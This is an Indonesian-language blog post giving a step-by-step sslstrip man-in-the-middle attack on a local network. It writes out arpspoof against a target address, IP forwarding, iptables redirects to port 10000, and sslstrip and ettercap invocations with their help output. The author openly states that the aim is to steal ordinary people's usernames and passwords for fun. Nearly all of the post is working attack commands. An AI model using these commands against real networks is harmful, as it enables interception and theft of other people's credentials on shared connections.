Beranda » Hacking » Hacking Sslstrip for Slackware (https,http)

Hacking Sslstrip for Slackware (https,http)

Start here

mencuri username dan pass org.biasa ngerjain org sambil minum kopi (annyamanna karaeng) kwkwkkw
to the point aja the

root@user-laptop:~# kwrite /etc/etter.conf

# if you use iptables:
redir_command_on = “iptables -t nat -A PREROUTING -i %iface -p tcp –dport %port -j REDIRECT –to-port %rport”
redir_command_off = “iptables -t nat -D PREROUTING -i %iface -p tcp –dport %port -j REDIRECT –to-port %rport”

hapus tanda pagarnya ya mas…

root@user-laptop:~# arpspoof
Version: 2.4
Usage: arpspoof [-i interface] [-t target] host

root@user-laptop:~# arpspoof -i wlan0 -t 192.168.2.108 192.168.2.244

kemudian isi pada

root@user-laptop:~# /proc/sys/net/ipv4/ip_forward

cara untuk mengisi or mengaktikan ip_forward

root@user-laptop:~# echo 0 > /proc/sys/net/ipv4/ip_forward [angka 0 berarti blom aktif]
root@user-laptop:~# echo 1 > /proc/sys/net/ipv4/ip_forward [angka 1 berarti udah aktif]

root@user-laptop:~# cat /proc/sys/net/ipv4/ip_forward [melihat isi dari ip_forward]

melihat host pada jaringan

root@user-laptop:~# tracert google.com
traceroute to google.com (64.233.181.104), 30 hops max, 40 byte packets
1 192.168.2.244 (192.168.2.244) 1.250 ms 2.134 ms 2.460 ms
2 192.168.1.2 (192.168.1.2) 5.653 ms 5.803 ms 6.082 ms

langkah selanjutnya

aktikan sslstrip

root@user-laptop:~# sslstrip –help

sslstrip 0.1 by Moxie Marlinspike
Usage: sslstrip

Options:
-w , –write= Specify file to log to (optional).
-p , –post Log only SSL POSTs. (default)
-s , –ssl Log all SSL traffic to and from server.
-a , –all Log all SSL and HTTP traffic to and from server.
-l , –listen= Port to listen on (default 10000).
-f , –favicon Substitute a lock favicon on secure requests.
-k , –killsessions Kill sessions in progress.
-h Print this help message.

root@user-laptop:~# sslstrip -a -k -f


aktifkan ettercap

root@user-laptop:~# ettercap –help

-T, –text use text only GUI
-q, –quiet do not display packet contents
-i, –iface use this network interface

e

root@user-laptop:~# ettercap -T -q -i wlan0

jalankan iptable yang anda pernah edit di kwrite kwrite /etc/etter.conf

root@user-laptop:~# iptables -t nat -A PREROUTING -p tcp –dport 80 -j REDIRECT –to-port 10000

good luck..
[+] Author : vim-n4n0


Tinggalkan Balasan

Please log in using one of these methods to post your comment:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s